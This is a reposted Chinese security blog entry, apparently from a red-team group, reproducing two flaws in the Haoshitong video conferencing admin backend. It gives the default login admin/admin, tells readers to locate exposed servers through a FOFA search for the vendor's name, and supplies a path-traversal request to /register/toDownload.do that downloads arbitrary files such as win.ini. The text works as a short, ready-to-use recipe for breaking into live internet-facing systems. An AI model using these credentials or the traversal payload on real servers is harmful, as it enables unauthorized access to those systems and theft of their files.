好视通视频会议-视频后台管理-弱口令+任意文件下载

admin 2022年8月28日09:19:32评论178 views字数 548阅读1分49秒阅读模式

前言

好视通视频会议-视频后台管理-弱口令+任意文件下载
好视通视频会议-视频后台管理-弱口令+任意文件下载




由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。






好视通视频会议-视频后台管理-弱口令+任意文件下载
好视通视频会议-视频后台管理-弱口令+任意文件下载


漏洞点

  • 弱口令  admin/ admin

  • 任意文件下载 /register/toDownload.do?fileName=敏感文件路径

漏洞复现

1、在fofa上搜索"深圳银澎云计算有限公司"。

好视通视频会议-视频后台管理-弱口令+任意文件下载

2、 访问链接,尝试弱口令 admin/admin,发现存在弱口令,可直接登录后台管理。

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

3、访问敏感文件路径,可以造成任意文件下载漏洞。

/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

往期精彩推荐
好视通视频会议-视频后台管理-弱口令+任意文件下载


记一次搭建靶场渗透过程(1)

记一次搭建靶场渗透过程(2)

记一次搭建靶场渗透过程(3)

GoldenEye 靶场渗透测试

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
好视通视频会议-视频后台管理-弱口令+任意文件下载

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):好视通视频会议-视频后台管理-弱口令+任意文件下载

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日09:19:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   好视通视频会议-视频后台管理-弱口令+任意文件下载http://cn-sec.com/archives/763581.html

发表评论

匿名网友 填写信息